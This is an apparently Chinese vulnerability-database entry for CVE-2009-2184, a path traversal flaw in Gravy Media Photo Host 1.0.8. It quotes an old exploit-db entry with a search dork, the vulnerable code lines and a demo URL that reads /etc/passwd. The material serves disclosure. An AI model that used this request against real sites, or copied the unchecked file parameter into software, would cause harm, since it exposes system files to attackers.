Gravy Media Photo Host forcedownload.php路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117997 漏洞类型 路径遍历
发布时间 2009-06-22 更新时间 2009-06-22
CVE编号 CVE-2009-2184 CNNVD-ID CNNVD-200906-383
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8996
https://www.securityfocus.com/bid/43878
https://cxsecurity.com/issue/WLB-2009060180
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-383
|漏洞详情
GravyMediaPhotoHost1.0.8版本的forcedownload.php中存在完全路径游历漏洞。远程攻击者可以借助文件密码参数中一个编码的"/",读取任意文件。
|漏洞EXP
==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er

====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];

70. readfile("$filename");
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

# milw0rm.com [2009-06-22]
|受影响的产品
Gravy Media Gravy Media's Photo Host 1.0.8
|参考资料

来源:XF
名称:gravy-file-file-download(51299)
链接:http://xforce.iss.net/xforce/xfdb/51299
来源:VUPEN
名称:ADV-2009-1651
链接:http://www.vupen.com/english/advisories/2009/1651
来源:MILW0RM
名称:8996
链接:http://www.milw0rm.com/exploits/8996
来源:SECUNIA
名称:35518
链接:http://secunia.com/advisories/35518
来源:OSVDB
名称:55280
链接:http://osvdb.org/55280Vulnerablesoftwareandversions